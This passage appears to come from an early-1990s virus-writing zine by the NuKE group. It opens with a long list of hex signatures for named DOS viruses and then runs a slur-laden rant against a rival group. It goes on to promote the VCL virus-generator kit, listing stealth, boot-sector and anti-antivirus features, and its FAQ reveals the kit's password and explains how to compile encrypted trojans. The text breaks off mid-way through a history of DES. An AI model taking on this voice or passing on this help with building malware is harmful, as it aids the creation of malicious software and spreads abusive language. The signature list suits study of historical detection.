b8cdabcd2181fbcdab74640e [NPX] NPox 2.1 b8dcabcd2181fbdcab74640e [Tim] TimeMark 892656008cd32e891e54008ccb [Rkm] Reklama f3b980008cc0408ec08cdb3bc37404 [Soy] Soyun e97c05cd218cc983c110 [SPh] Swiss Phoenix 0726803eff04ff7501 [Wlk] Walker b8840050e92c07902e8c1eee07 [Mds] Madismo b85315ba72010500003b060200731a [VM] VM 81ff8d00750304084757cf [7S] 7thSon 81ed0301be8b0103f5bf0001 [BUG] Bogus 21b44febe8c35c2a2e2a00 [BUG] Bogus 1fa113048bc8b106d3 [BUG] Bogus eb69900002100038000100 [kiri] Hara bef6fd3a83c1fd7431803e [LZ2] LZ2 fdbef80aebbc62e9c204000364e9 [LZ] LZ cdf1dae3629ae5f2febf48 [Fnz] Fri13-nz 16070183c203cd217217b440b96f [For] Forger2 81ff78567507e9e900fe023714fc [OW] Yukon b9970090ba0001cd21b457 [Stb] Stealth ff0e1304fac7064c00a700 [Msht] Mugshot 8b1e1304b9060083eb0731 [Mon] Monkey b90002fc268a05342eaae2f8 [Arag] Aragon 33c08ed8be137cb9a5018a3eba [1554] Ten_bytes fe5a580306410383d2000306 [VTS] VTS 071e26a12c000bc075 [BKil] Boot Killer 33ffb90002f3a4ea1f000030061fb40d [NOP] NOP 8bf4fba11304 [Klr] Kilroy 904b494c524f59 [H-2] H-2 eaa701c007444f53 [WM] Windmill 13048b04488904 [Curse] Curse fbb8c0078ed81eb8520050cbb840008ec0 [Filler] Filler f7e32d00108ec0 [MBug] Music Bug 8cc88ed88ec08ed0bc00f0 [Iboot] Israeli Boot cd13b80202b90627ba0001 [Ghost] Ghost 90ea59ec00f09090 [Mich] Michaelangelo a14e00a30c7ca113044848a3 [Stoned] Stoned ab004848a31304b106d3e0 [Emp] Empire ea9f01c007 [Mardi] Mardi Bros. d88ed0bc00f0fbe827 [EDV] EDV 751c80fe0175175b071f5883 [Alameda] Yale/Alameda b400cd13720db801 [Loa] Loa Duong fb8ed8fe0e1304a11304 [Teq] Tequila 8ed3bc007cfb33ff832e13 [Micro] Microbes 8ed0bc00f0fba113042d04 [A-Vir] Anti-Tel fb8ed8a1130448a3 [P-2] Print Screen-2 7401bf0300b92000f3a4 [PrtScr] Print Screen cd05fec8a26001c36f6e2d [Korea] Korea 8ed0bcf0fffbbb1304 [Killer] Disk Killer c310e2f2c606f301ff90eb55 [Brain] Pakistani Brain c30002e2f4a113042d07 [Form] Form e8b2005a5e1f33c050b8007c [Ping] Ping Pong - B a1f581a3f57d8b36f981 [Tboot] Typo Boot 241355aa [Flip] Flip fbb80300e81f0006b8 [Joshi] Joshi f3a48cc00520008ec0bb [1253] 1253 e4cd1333db2e8a36207d2e8a [Atx] Anthrax 75ed061e071f32f6b9020033 [Invader] Invader 8ed8a11304b106d3e08ed8 [Queen] Queen's 8ed88ed0bc007c50fb33 [Invader] Invader b3ffb84342cd213d78567513072e [Genb] Generic Boot fab8c0078ed8bf00 [OW] Leper baab03b43bcd21463b360d03 [OW] V1-Not b9ff00ba0000cd26b400cd16b80300cd10 [OW] 8000 7504b000eb02b001a2a43c [OW] Lug e8d90159b88c0650e8d10159b8c306 [OW] Wake bb3f01908a27903226080190 [OW] Explode 8132f6ebd8b041e674ba40008edabb72 [OW] Dust ba9e00cd21b440b93200ba0001 [OW] Veng-B 8b1efc01b9fc008b16020283c262 [OW] Veng-C 8b1e8602cd217246909090890e8802 [OW] Veng-D 8b1eb302cd217246909090890eb502 [OW] Veng-E 8b1e2703cd217303e9dd00890e2903 [OW] Veng-F 8b1e390333c933d2cd211eb43f [OW] Scribble ba6c03b43fcd21e82900 [OW] Banana b98b0090cd215a59b80157cd21b43ecd2159ba9e00 [OW] Leper baab03b43bcd21463b360d03 [OW] 102 ba6001b92600cd21721eb441ba5301 [OW] Blaze b91c01cd21b43ecd21b44fba0001cd21 [OW] 4915 bf3e040e5731c0509af90867 [OW] Silver3b f6b8030550e8eb0159e8a7000bc0740a [OW] Secrets 3e01a006010ac0740b300743 [OW] Seneca 81f9bc077e1beb0190b42a [OW] V1_1 891e70008c067200ba7400b41a [OW] V2_0 891e82008c068400ba8600b41a [OW] V1_0 891e5b008c065d00ba6500b41a [OW] Aids92 48002648616802212020 [BFD] BFD bb9201eb2133c0be007cfa [Pnz] Penza b9bc02f3a4061fb82135cd [Mgm] Magnum b9be092e00042ef6ad [Plu] Plutto 8b36010181ee00022e89360001 [Prm] Prime 2b01b94402512ea00701 [Sui] Suicide 81ed0701e80200eb41b9e803 [Ata] Atas b92b00b2aa8dbe6200fec23015 [Squ] Squisher ee11b844008ec0268a1db95401 [007] 007 2135a804020056051902280206 [132] 132 80f44b7549b8023dcd [658] Something eb0e536f6d65746869 [Hck2] Hacktic2 80c6108ec25256b426 [V9] Virus9 890e6d01891671015b [5856] Bow bec20903f3b94f002e [vvf] VVF-34 8b1e03004081ebda0089 [1280] 1280 ba0005cd21e8d500bf5004 [2136] 2136 81c45809fb3b26060073 [VDV] VDV-853 8aa44f048dbc2001b92f0389 [Lam] Lamer 87060e0050cc589d5826 [Alb] Albanian e80000bb4c03538bfc33f6 [SilW] Silly Willy be15008b1ab9d00881e973 [Con] VCL e800005d81ed06018db61403bf000157a5a4 [Con] VCL e800005f83ef038d750de8 [Con] VCL e800005d81ed0601e8 [Dst3] Dest3 8b2e010181ed1fffe8e7ffbc4e02 [DTR] DTR 892624018cc88ed0bcf701 [Sk] Sk ee09b800008ed8893612030e1f [Sk1] Sk1 ee090e1f0e0789366f04fcbf [500] 500 21813e7c021e03754db452cd21 [Ash] Ash 81ed0b013ec6864702008db604 [C16] Com16850 892e333cc7061d3cffffe81301 [Hpp] Happy 8dbc190181c61201b9070090fc [Lix] LixoNuke 015e568bfe33c08ed8c41e4c [1182] Hellween 1182 014434803c00750c8b4401a3 [Tr2] Troi Two a384008c1e8600fbebb99c80fc [Mch] Mocha bf0a01be96011e0e1fe8 [CV4] CV4 8d77cabf0001b90500fcf3a4 [GK] Geek 891ebb038c06bd03baa4 [557] 557 b8cdabcd213defcd7405e8 [Pia] Piazzola be6a04bf0001b4ddb900ff [Rttl] Rattle 81ed03018d9e20018d968b013e8a8e0301 [Mex] Mexican 8a8e03013bda7405300f43 [Egn] Evil Genius b8cd7bcd2181fbcd7b747f33db0e1f [Slv] Slovak 80bcfefc007406b8cb11 [Slv] Slovak 268a1d32d82e881d041147e2f3c3 [Req] REQ 01ba2a0003d78bdab41acd [ZY] ZY 8b0ecb0281c100012e890ecd02 [Why] Why_win bb01018a27bb02018a07 [fizzle] DataFire fdb419cd2188466de8e2fe [Davis] Davis b9a706fcacc0c8042e3206a706 [Cha] Chang c3fa0e1f33c08ec0bf0c00a1 [VA] VA b963068cc88ed8bf0000b8609f [Gre] Green 8986160433ffc7454a0000 [1030] 1030 8ec033db26891fb880 [Chs] Chaser 8a160900bb38008a0732c2 [RMIT] RMIT f6e88b000bc0740ae851 [1661] 1661 fa8bece800005e81ee9a012ef684 [Ptch] Pitch ba220083c202061fb84725 [Mls] Malaise 81eb970483eb038cc82e [Blus] Bloodlust be5d018bfeb92e01b37f [Trk] Turkey 81eb29012ef687220101740f [417] OMT b9890180352a47e2fa [Topo] Topo fa0633c08ec0b82b002687060c00508cc8 [Ant] ANT 8a260701eb1290ac32c4aae2fa [702] 702 5e3dc707751133c08bd88bcb [205] 205 81eec900b44ebabf00 [1835] 1835 be9c0781ee030101de8904be9e07 [Krv] Krivmous c43e07010657c43e0b010657ff [Lan] Lanc5476 8000179e83da00739581eb8b [Lan] Lanc5882 80118b1e3a04c82ef726e904 [Lan] Lanc 9a0e02f000b8f401509a9e025e [PA] PA-5792 3ec300417407803ec30042754a [Cas] Casc1621 81eb070183bf010100740e8db7 [Sti2] Stink2 890e7801c6062d0101e8ab00 [Timid] Timid305 ba48ffc70655ff2400b409cd [Tmd] Timid e80000832efcff09ba2a [Eno] Enola 81fb91197503e91101b452 [Crk] Cracky 83ee0956fcbf0001b90500 [Mum] Mummy 04062e8c0665002e8c [Che] Cheeba 8035264781ff6807 [Nina] Nina b90001f3a42d100050b8370150cb [Dot] Dot Killer feb9400057f3a458ffe0be0001 [Sta] Stahl Platte b90001f3a48ec01ee9b101 [Er] Error 80fcdd7426b82135 [Sat14] Saturday 3e720201740c0106900083 [E92] Europe 92 83c62dbf000157a5a5c3 [Hre] Here 1eb8f000508becff5e0058 [Sdot] Star Dot b44fcd2173e5ff0641038cc8 [789] Dot-789 8ec0268b1e6c04891e6604 [Tum2] Tumen V2.0 e813feb4ffcd213d000074 [Key] Keypress fa2b06920383da00a39803a3 [T12] Thursday 12th 8a26290132260001be0301 [1992] 1992 d8b9a006bf03002ea0 [1992B] 1992B 2e8c0601008cc88ed8bf0300 [Mule] Mule 2e8a262f0e3e302743e2fa [T3] Taiwan3 b8404bcd213d78567512 [T4] Taiwan4 b8504bcd213d34127510 [Fu] Fu Manchu b4e1cd2180fce1731680 [DAME] DAME be762d81f699548bdebec690 [DAME] DAME bbbaf4be84a78acb80e11f [DAME] DAME b82846bab38df7ea2d3e21 [DAME] DAME bebaf4bb72c52b9c4810b106 [CMDR] Commander 33e4fbe87400 [Bmb] Bomber bb4d0830071e2bf68ede [Boo] Boojum d8bb1700291e030029 [928] 928 bf000157be2b03b90300 [Mog] Mog bf0001fcffe7b40e [880] 880 bb36008a0732c288 [Hrs] Horse cd200a0d4f4b [334] 334 81ee0b01e80900e8 [Shld] Shield 8d0e2f0e2bcafcac [2623] 2623 b8ab9ccd2f3d76 [LK] LK bf000189fe83eef0ff [Em] Emmie 21c646950081f9bc [Bt] Beast 8bf283c619bf0001b90300 [Qk] Quake 81fbba00744c891e [981] 981 213d51907455be02 [1339] Mummy 01065c04b84242cd [Ill] Ill ea2033ff3e8a86 [ZMT] ZMT 01b9fc00f3a4b8000159 [MPC] MPC a503b9140033f633c0 [Gls] Gliss 83bcdf04017402cd20 [Anto] Anto d87234b43fba7ffdcd [Kzm] Kuzmitch b915038a5466309051 [Pch] Peach 53e8800050f3a6741e [Imp] Imp 213d71197503e9bb00 [Sqk] Squawk 81bc30034d5a742e [Troi] Troi b4fccd213ca57428 [Shd] Shield b9afb560b5b3a5 [Mnc] Munich 8d2614078cd903 [Emf] EMF 83ea03b99301cd21 [Bst] Busted 0732060601880743 [Mut] Mutating e82b004665617220 [Mut] Mutating 04d3ea83ea108cd903caba6d [RusD] Russian 04d3ea83ea108cd903caba56 [914] V914 04bbde03b97f0058 [Bwr] Beware 8102578bd6fcb903 [1308] 1308 9047e2f8a97e39c3 [Sadt] Sadist 89261c008cc8fa8e [DMB] DM-B bf00018bc7 [Crp] Creeper b8ff43cd218cd82d11 [1376] Hellween 81ee58015650060e [Bob] Bob 81f9c907720680 [HS] HS b8874bcd213d636675 [MFC] Mface 3c75062ec6878a01 [DOD] DoDo 80fcab7502eb31b8 [DD] Dada 0e27062e891e2906 [Sr] Scream d8ff0e1304c51e8400 [Mlg] Malaga 01a2ca07a2db07a2 [K] Micropox 1ffd720db8f3c1cd [JD] JD a45f57b82135cd2181 [CKs] CKsum 129c9d03079c4343e2 [109] 109 a4ba00feb41acd21ba67 [P45] P-45 b44eba270131c9cd2172 [Qt] Quiet 8cc801060c01ff1e0a [Sh] Sh 1e650353e819005bb9 [Bry] Brainy e800005e56fa83c61b90 [CV] C 4d414effffba [Crm] Criminal fc11742680fc12742180 [Hng] Hungarian c30eb000fad50a8807 [A16] August16 ba790203d7b41acd [D-T] D-Tiny 07aba5b82125cd2107 [Def] Define 013dba9e00cd2193 [Mar] Marauder 5e81ee0e01e80500 [487] 487 f3bf0e0c0e579a16 [Psc] Psycho ba1603cd21726fb8 [Mn] Mannequin 813e670456441f75 [Dmo] Demolition 8d77178a04d0e0 [HW] Halloween b8b8009a44025701 [1244] 1244 b4e0fccd2180fc0375 [730] Ontario b86e4bcd213d545675 [Sov] Sov 5b0eb90001511e06b1 [1186] Lib1172 5351bb12018b0f1e5b03 [Rag] Rage ea83c5419055eb0d50 [El] Eliza 43b42acd2180fa0d75 [Bet] Beta 8bfeac32c4aae2fa [472] ASP-472 d8bb980001d38b0f [Plov] Plov 12b42ccd2180fa327c [QML] QMU ed78060e1f0e07bf [M11] MPS1.1 8b84d301408984d3 [D10] Day10 f347ba5448263915 [Tn] Tony b8b70050cb546f6e79 [JK] Joke 894e4972eab801438d [SX] SX e70108fe0ee701be [Bro] Brothers fc1e7c0fb413cd2f [Sti] Stink 1f890f894f026107 [KU] KU-448 e7fe0fbe2c0190b9 [HrB] Hero-394 2e8384670310061e [Hary] Hary bb3e0281eb2a018b [Sqe] Squeaker fbe9b3feb000b4 [MPS] MPS 3.1 80f4a78865289047 [370] 370-B 213d55557503eb5b [V-5] V-5 1620022e891600018a [802] PC Flu e81f001febfefa [M-123] Multi 8b44f4a300018a44 [Gr] Grapje f8b44732d28d36d901 [SCT] SCT b40eb202cd218cc8 [Barc] Barcelona b44a0e07cd21fcb80000 [LCV] LCV a4c31e071e8e1e260133 [1452] 1452 52e80602722ee891 [621] 621 81f9d0077503e9d2 [CRF] CRF 81ed0b01c6863d02 [RST] Reset 1fe800005d8daeaf [Ph] PathHunt 81ed1405c3bb0501e8 [1701] 1701 81eb3101f6872a01 [408] 408 2e03015b53c33d4b [Set] Semtex 8bf581c681028bfbb907 [Ws] Wordswap fc40741b3d4230750c [GY] Got-you 8bf82eff2eb000cd [D2] DIR-2 04ffbb6000b44ae8 [Ein] Einstein 8b1647008e1e4500b800 [Nbk] Nobock f88bef7451bb0001 [Jrk] Jerk e8f502e877009d5dbd00015533ed [M128] M-128 8ec0bf0303b17df3a4 [Boys] Boys ebd85b5383c307c607 [BT] BackTime e800005bbf00018db7 [Tokyo] Tokyo 8ed0bc8c01fbb462 [Spain] Spanish e9fbfde9250b06570e07bf [748] 748 8ed8813eac014642750881 [Spz] Spanz e800005e81ee0f018d [Mant] Manta e814008aa42f058dbc20 [Twin] Twin-351 b810ffcd213c077507e8 [Hitc] Hitchcock b430cd213c02720ab8fe4b [Mosq] Mosquito b8080050eb055890eb3e [ETC] ETC e91c02eb05e9d400908b16 [Kla] Klaeren 5b81ebaf03b9a5038037 [D28] Spanish April Fool 8ed08b261400fbc6063e [CRJ] Cracker 3a5222110a061945384129 [Bgh] Burghofer cd215b488ec0fa26c70601 [Dei] Deicide b95000ba0000cd26 [268P] V270x 8ec10650be00015631ff [1067] 1067 cd218a4403a202018a44 [337] 337 8c4402b425ba6001cd21 [WWT] WWT b44eb90100cd217302eb [PCV] PCV b94f072e8a9708002e0010 [2559] 2559 ed07eb0190eb0190eb0190 [Drp] Dropper 8bcdf3aa33edad91ad920a16 [Aust] Australian b87d4bcd213d545675 [144] AT144 8bfee800005e83c631a4 [Kiev] Kiev 8be9e800005b538b87 [733] 733 8b43018f06b95eff8f [LC] Love Child f7b603fec5ebf14c6f76 [BB] Bad Boy 2eff3627010e1f2eff262501 [PS10] PrtSc d8a113042d0200a31304061f [1963] 1963 e8bb068ec033ff33c0af [Grb] Growing Block eb83c3202e8e068500b44a [Raub] Raubkopi fb8cc88ec0e804fbba3f01b4 [Z900] ZK900 ea83c2042bdab44a8cc1418e [BCV] Sentinel e583ec128c5ef455e816fe [Spar] Sparse b8554bcd213d31127476b821 [Svir] SVir e82a0133c98a2e1a00e30dfe [TV] Tester f3a4b409ba0301cd21baa1 [Staf] Staf e881ffb80030cd213dd207 [MX2] Mix2 e83500e81b00ba0000b9e808 [453] RPVS 8cc88ed8be01012e8b0405 [Guppy] Guppy 8bd8cd21899c95008c84 [Crazy] Eddie 8b46043bc374143d7000 [Ar] 834 e8ac02e87101e89e01e85502 [V299] V-299 b80042cd21721a33d22e8b [Pht] Phantom ea000183ee0603d6e8c8 [Lazy] Lazy b800008ec026a142002d [Sylvia] Sylvia ebf781f9a3467503eb [905] 905 f1cd2181fa0e0e7459ba [Plg] Plague c3bb34018a27322606 [T133] Tiny 133 a58ec1939191268785e0 [Pt] Patient b9b4052ea00a01bf2c012e803e09 [Hyb] Hybrid ea007497ab2780885d18d4 [LPC] Pieces ee3c00b82135cd212bdb26 [Sdm] Saddam a11304bb4000f7e32d67 [MG] MG a4c43e0600b0ea49f2ae [S143] Swiss 143 d6cd21803c5074178bd7e8 [Label] Label bf4c005733ed8eddc4 [HNY] Happy N.Y. e8f90373358dbcfc012e [T133] Tiny 133 bb2f06b950008bfed374 [Jus] Justice 5b83eb592e89474d2e894f4e [Hymn] Hymn 5e83ee4cfc2e81bc4207 [Destr] Destruct e87dfc1e0e8e5e13c4 [U830] USSR 830 5b83eb0383eb312e895f [BeBe] BeBe 0e8cc82e01060c01ea [MGTU] MGTU e8b44e8d16030103d5cd21 [Data] DataLock ed2801be280101ee2e813c4d5a [Lehigh] Lehigh 5e83ee038bde81eb9101 [Dm2] Doom II 3e0a014574052e033e0301 [Wisc] Wisconsin 8b0e0601be08018a0434 [170X] Cascade 31343124464c [Lisbon] Lisbon b41acd2106568e062c00bf00005e [Vienna] Violator b42ac6069b050190e8d6ff81 [BMon] Black Mon 25cd21a10a008ec0bb80 [Ont] Ontario 2 562e8a84e801b9e801f6 [1024] 1024 2bc875ed8bd1b80042cd21 [RKO] Rocko 8bc440b104d3e8408c [Hal] Hallo 8cd08bd4bc0200368b0e [Paris] Paris 21b43fb918008d1688028d3686028b1c [Syslock] Syslock 3306140031044646e2f2 [Fish] Fish 0e01cfe800005b81eba9 [Nom] Nomen 51b9ffff9c0ee82e00599c [2133] Scott's 8bde909081c63200b912082e [Oro] Oropax 3e011df277d1ba00 [JoJo] JoJo 4d2bd04a4503e8458ec5 [Dance] Devil's 5e1e068cc0488ec026 [Tricks] 12 Tricks 640231944201d1c24e79f7 [Shake] Shake 31d28bcacd213d00f073 [V800] V800 51ad33d0e2fb59311547 [June16] June 4da9a52e70662e57090f [Taiwan] Taiwan 8a0e950081e1fe00ba9e [J13] July 13th 1200b9b1042e300446e2 [1210] 1210 c474f02e803e2f040175 [Vcomm] Vcomm b92000b44ecd21730c [VP] VP 891e22038c062403b41abac6 [Jeru-A] Jerusalem f3a526c606fe03cb58 [C-J] Japan f581c60005803ce9 [XA1] Christmas Tree fa8bec5832c089460281 [Sorry] Sorry eb96832e120040832e03 [Rtiny] Tiny 8bfa0e1fcd3257b04df2ae [1381] 1381 c88ed8b840008ec0fce85804803e [Ita] ItaVir b85845894002b000884004 [Liberty] Liberty e8fdfe722a3bc17c27e8 [Vacs] Vacsina b801438e5e0e8b56062e [Wolf] Wolf 8ec0b87725d3e326ff [Flash] Flash b000fad50a8807eb05eac0 [Zero] Zero eb2b905a45cd602e [A2] AIDS II a4005589e581ec0202bfca050e57bf3e01 [fume] Perfume 0406bfba0057cb0e1f8e06 [Joke] Joker 5607450721071d49276d20736f206d7563 [C-2B] DC II-b 2e8a0732c2d0ca2e [Not] Nothing 720450eb0790b44c [Dbase] DBASE 80fc6c74ea80fc5b74e5 [Alabama] Ala 8f061805268f061a [Crime] DC 36010183ee038bc63d00 [DC-2] DC-2 8a9403018dbc29018d8cea06 [Ice] MIX1 43813f455875f1b80043cd21 [SurivA] Suriv A 735552495600 [Yap] Yap e800005b81eb31012ef687 [2480] Crew-2480 cd21b6008bc2b11ef6f13c Screaming Radish/NuKE =========================================================================== =========================================================================== A "Virus Group" or "Viral Warez?" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As a long-time figure in the virus world, I cannot help but be disgusted by some of the upstart new "virus groups" that have been appearing in the last six months. These so-called virus writers are little more that warez people who like to pass around viruses instead of pirated software. For example, there's one Toronto-based group, who shall remain nameless, which has it's own couriers and ANSI makers. This is sickening. This sweet-potato "virus group" consists of a bunch of geeks who get off on mass-producing lame viruses, then typing up stupid .NFO files remeniscent of INC and sending the package out around their local area. Too cheap to call long-distance, too lame to phreak, these scum are largely confined to Ontario, though they claim to have sites all over the world, which are, of course, PRI-VATE, making them conveniently hard to reach. A good thing, too, since these sites don't exist. Then these faggots create their "own" virus-generator using code ripped straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners), then don't give credit where credit is due... This lame virus generator comes with a nice snazzy .NFO file with huge, dripping ASCII drawings of their group's name, nice boxes, credits, etc., straight out of an INC/TDT info file. Not only that, but this group can't even decide it's own name, which changes from virus to virus, from newsletter to newsletter. (Youth, youngsters, which is it? Why not just change it to "14-year-olds?") The membership is also constantly changing. Most members don't do shit, while a few write tons of lame trojans and viruses so that they have something to brag about. VGA artists? ANSI artists? What the fuck is this? Since when did a virus require a graphic? It seems as though the group can't decide whether it'll put out art or viruses... And what sort of virus group has couriers? Are their viruses so awful that they won't spread by themselves? Why do some members have personal LD couriers to call across town? (Too cheap to pay for local calls? When the split to 905 occurs they'll probably have to retire!) Why do they have couriers, period? Next thing you know they'll have full-time doc writers. Wait, they already do! I guess the people who run this group are too dead to think of their own shit so they have to hire others. If we're all lucky, these people MAY go away soon, VIPER themselves into retirement. Of course there are always plenty of groups to rise up and take their place. There are groups that form and then break apart because no one knows how to program. There are those one-man groups of people who are too repulsive to get anyone to help them... I guess these groups serve one important function -- they make the real virus programmers look that much better. Thanks guys. Nowhere Man/NuKE =========================================================================== =========================================================================== VCL v2.0 Update ~~~~~~~~~~~~~~~ "What's happening with VCL v2.0?" is all we ever hear today. Well, making a product like VCL is not as easy as you may think! Let's compare. VCL offers the user unique user-configured viruses; if you want it to display a message, no problem; if you wish to add a routine, no problem. It's very flexible, unlike other virus generators. The others simply consist of one generic virus, a simply blocks out unneeded parts to generate your virus. The options it gives you are junk, like "Infect .COM" or "Infect .EXE." Please, we don't need that, you could just hack out a pre-existing virus if you want that. VCL is much more complex. Nevertheless, we did it once with VCL v1.0, and we will continue to set the standard with v2.0. The VCL kit is STILL undergoing construction. It will feature a similar user-friendly environment, but the viruses produced will be much better than before. The key word is STEALTH, v2.0 seeing the addition of TSR viruses with numerous stealth options, some never seen or tried before on a virus. Some of the new features of VCL v2.0 include: o .COM, .EXE, .OVL, .SYS, and .BIN infection o Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and 2.88M diskettes o MBR/partition infections for hard disks o Directory-entry infections (similar to Creeping Death) o Incredible stealth capabilities o Cryptex(C) encryption generation, with support for MtE and TPE o The NuKE Encryption Device, a mutation engine by Nowhere Man written for use with v2.0 o Anti-anti-virus options o Improved anti-trace options o Increased user control over virus creation (more options!) o New effects and conditions o Enhanced environment v2.0 will also differ from the initial release in that it is a team effort. While v1.0 was entirely written by Nowhere Man, v2.0 is a complete NuKE collaboration; besides Nowhere Man, Rock Steady, Screaming Radish, TäLöN, and others will be working on the project. This allows us to expand VCL in ways that one man alone could not hope to do, a perfect example of the increasing cohesiveness of our group. So, when will v2.0 be completed? We can't say for certain. Already several deadlines have been broken, and we'd rather not promise any dates. All we can say with certainty is that it will be released before the end of the year. Keep a look out for it, and keep those suggestions coming! VCL v1.0 FAQ ~~~~~~~~~~~~ Nowhere Man has provided us with a list of frequently asked questions (and their answers) concerning VCL v1.0, which we present here. He requests that no more bug reports be made, as v2.0 is being rewritten from the ground up and so should therefore be free of bugs in v1.0. Comments and suggestions are still welcome, however. Q: HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM? A: VCL v1.0 was password-protected for this very reason: to keep lame fucks like this from using it. I gave out the password on every NuKE site, and relied upon word-of-mouth to spread it from there. All "good" boards would probably get it. However, seeing as v1.0 is now becoming outdated, I've decided to be generous and tell the password to the world: it's "Chiba City" (typed exactly as shown, capital Cs, lower-case otherwise). Please do not mail me (or anyone else) for the password, 'cause I'll just delete the message. (For those who are interested, "Chiba City" was a random phrase taken from William Gibson's _Neuromancer_. There was some conjecture on the nets a while ago as to what it meant. It's a city in Japan where much of the book's action takes place.) Q: Why do you include an IDE (Integrated Development Environment)? I mean, using an IDE is akin to a walking person intentionally crippling his own legs or a sighted person poking her own eyes out, right? A: Fuck off, Dark Angel. :-) Q: How come VCL doesn't install properly? I type in the password (Chiba City), but it says I need to reinstall from an original copy, or it hangs when creating VCL.CFG. I'm running with (whatever)... A: Ok, there can be several causes for this. First, VCL v1.0 will not work with Stacker, SuperStor, or any other on-the-fly disk compressor. Sorry, but I was unaware of this problem for quite a while, since no one I know uses Stacker. Run it from an unStacked disk. The other problem could be caused by a bad version of INSTALL.EXE, the installation program. I have released a new version of it under the name NEWINSTL.ZIP (some copies of VCL will have the new install included). If you don't already have it and you can't install properly, try using the new version. If all else fails, only install to C:\VCL, that should always work. Otherwise, your problem is a corrupted .ZIP or a hacked/pre-installed copy of VCL. Use only the original version. Q: Where's your source code, dude? I want to hack it so I can make my "own" virus generator, but I can't seem to find it. Is it inside the .EXE or something? Please help me soon, a new version of IVP is due out next week! Also, why don't you include some ANSIs with VCL and put in a .NFO file with elaborate ASCII setups, NoWhere Man? A: (Nowhere Man draws a gun, raises it to the head of the blithering, fourteen-year-old Torontonian fashion-tragedy standing before him, and pulls the trigger. KABLYAM!) Seriously, the source code to VCL will not released to the general public, it's for NuKE internal use only. Sorry. Nowhere Man will be happy to answer any general questions as to the workings of the VCL IDE/compiler, if you're wondering how it works. Q: VCL won't compile my virus. How come? A: There are several causes for this, too. First, you may not have your assembler configured correctly (check it out from DOS, and be sure that the Assembler string is set correctly), or you may not have an assembler at all. If your assembler normally works, it could be that you don't have enough memory for the compiler (VCL shells out to run it, and it itself uses 200k, so if you have low memory when starting VCL, your assembler will have even less). Try removing TSRs, decreasing buffers, etc. if this seems to be the case. Your assembler might not be truely MASM/TASM compatible, too. Specifically, A86 will not work with VCL without user-modification of VCL-generated code. There is also the chance that a routine that you've added has bad assembler code, causing your assembler to abort, spoiling the process. There's also the very remote chance that VCL has produced bad code (when there is low memory a stray pointer sometimes causes VCL to go haywire and churn out bad ASM code). If none of this seems to be the case, just Make .ASM and assemble it yourself from DOS. Q: HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO INDIANA TO GET ME FIREWORKS! A: Go to hell, Suicidal Maniac! Q: I've written a virus and it seems to crash occationally or give odd error messages. What's up? A: Do you have Anti-Tracing functions on? If so, turn them off. I made a small mistake in the anti-trace code which can cause system crashes under some conditions. It worked fine for me, but on some setups strange things can happen. If you don't have anti-tracing on, I'm afraid I can't help you...just look over the code (if you no assembler) and look for possible errors. Q: Ok, I've written a trojan horse, but when I run it, it crashes. I've compiled from DOS with... A: Ah ha, that's enough! As I stated in the on-line help, when using encryption on a trojan horse, you *must* compile from the VCL IDE. If for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You see, unlike viruses, which can start off unencrypted, trojans must be encrypted from the start, since they only go off once and are sent direct, not in infected files. For that reason, the general technique of having the initial encryption key be zero (used by almost all encrypted viruses) won't work; VCL generates the encryption routine assuming the trojan's already encrypted. When you compile from the IDE, VCL pre- encrypts the trojan, so the encryption/decryption routine decrypts it at runtime. But when you compile from DOS, the trojan is unencrypted, so when it's run, the routine *encrypts* the virus, causing it to crash (the processor's trying to run useless code). Q: HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO I DO FOR IT NE WAY? THANX L8R!!! A: Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF! Q: When I link my virus, it says "Warning: no stack." What's wrong? A: Absolutely nothing. The linker can give this message if it's generating a .COM file (which all VCL executables are). It thinks there should be a stack, but .COMs don't have built-in stacks, only .EXEs do. Be sure to run EXE2BIN, however, as the linker output an .EXE file. Nowhere Man and The NuKE Associates =========================================================================== =========================================================================== Data Encryption Standard (DES) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The DES algorithm is a mathematical device, not an IC chip, computer system or other piece of hardware. Several of H/Pers have heard of the buzzword "DES Encryption" many times and, yet, few individuals seem to know what it really means. Therefore, on my search to find out more about the IBM 9600 modems included with the IBM 4700s, I fell upon the need-to-know on how DES really worked, in order to learn about its fallbacks, hopefully this will answer many questions you have, as well as generate a few. The Computer Age brought with it computer usage in banking and the financial institutions. Inevitably, computer crime came along with it. There arose the problem that, with sufficient knowledge and a computer terminal, one could transfer funds into his own account, make credit purchases on someone else's card, or even get money from a cash-dispensing machine. IBM quickly realized this and in the early 1970 set up a research group to develop a suitable cipher code to protect data. In 1971, a code named LUCIFER was developed. It was sold to Lloyds of London for use with an IBM-developed cash-dispensing system. LUCIFER ~~~~~~~ Lucifer was successful but it had some weaknessess. IBM then spent about three years refining and strengthening Lucifer. The code was analyzed over and over by experts in cryptology. It withstood sophisticated cryptoanalytical attacks and, by 1974, it was ready to market. Around the same time, the National Bureau of Standards (NBS) which since 1965 was responsible for developing standards for the purchase of computer equipment by the Federal Government (USA) initiated a study of computer security. The NBS saw a need for an encryption method, and solicited for a suitable encryption algorithm. This was done in May 1973, and August 1974. The algorithm was to be for the storage and transmission of unclassified data. In response to this solicitation IBM submitted its Lucifer cipher. This cipher consisted of an extremely complex algorithm embedded in an IC structure. Basically the cipher key goes into a series of eight "S" boxes -- complex mathematical formulas that encrypt and decrypt data with the appropriate key. The initial Lucifer cipher had a 128-bit key. Before it submitted the cipher to NBS, IBM shortened it by removing more than half the key. NSA Participation ~~~~~~~~~~~~~~~~~ The National Security Agency (NSA), however, had taken an enormous interest in Project Lucifer. It had lent IBM a hand in the development process and had helped to develop the S-box structures, as NSA needed to know the structure of Lucifer just in case they needed to decrypt data encoded with it. For years NSA had been dependent on international data communications. It monitored data communications, such as Middle East oil transactions and messages, and the financial and trade transactions from Latin American, Europe, and the Far East. Also, military and diplomatic intelligence (encrypted using crude techniques) were picked up and deciphered by NSA. Thus, much information about Communist countries was obtained from non- communist countries. Now, the development of an economical, highly secure, data-encryption device threatened to cause NSA serious trouble. Also, outside 